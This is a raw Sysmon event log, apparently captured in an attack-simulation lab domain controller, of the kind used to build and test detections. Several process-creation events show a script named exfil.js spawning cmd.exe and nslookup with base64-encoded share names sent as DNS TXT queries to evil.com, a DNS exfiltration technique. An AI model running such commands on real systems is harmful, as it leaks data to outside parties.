14:16:05.176{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.176{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.176{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.176{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-A63D-000000005F02}7316C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.176{2E1864BB-17A1-629A-783D-000000005F02}55521132C:\Windows\System32\WScript.exe{2E1864BB-17A5-629A-A63D-000000005F02}7316C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.182{2E1864BB-17A5-629A-A63D-000000005F02}7316C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsmxwj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.176{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfgkmqzn.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.098{2E1864BB-17A5-629A-A43D-000000005F02}61162444C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-A53D-000000005F02}5040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.098{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.098{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.098{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.098{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.098{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-A53D-000000005F02}5040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.098{2E1864BB-17A5-629A-A33D-000000005F02}26681276C:\Windows\system32\cmd.exe{2E1864BB-17A5-629A-A53D-000000005F02}5040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.109{2E1864BB-17A5-629A-A53D-000000005F02}5040C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A5-629A-A33D-000000005F02}2668C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfgkmqzn.tmp 2>&1 10341000x8000000000000000194086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.076{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-A43D-000000005F02}6116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.076{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-A43D-000000005F02}6116C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.076{2E1864BB-17A5-629A-A43D-000000005F02}61162444C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-A33D-000000005F02}2668C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.060{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-A43D-000000005F02}6116C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000194082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.060{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCA82B72FE73AE7923C00C8A277A8C82,SHA256=C0D7F8C6DADA3102271AF019BB96AF656DFB3EC442746DC37B3ECD3A79C816A5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.045{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.045{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.045{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-A33D-000000005F02}2668C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.045{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.045{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.045{2E1864BB-17A1-629A-783D-000000005F02}55522672C:\Windows\System32\WScript.exe{2E1864BB-17A5-629A-A33D-000000005F02}2668C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.058{2E1864BB-17A5-629A-A33D-000000005F02}2668C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfgkmqzn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.045{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvghi.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.014{2E1864BB-17A4-629A-A13D-000000005F02}66602236C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-A23D-000000005F02}1692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.014{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.998{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 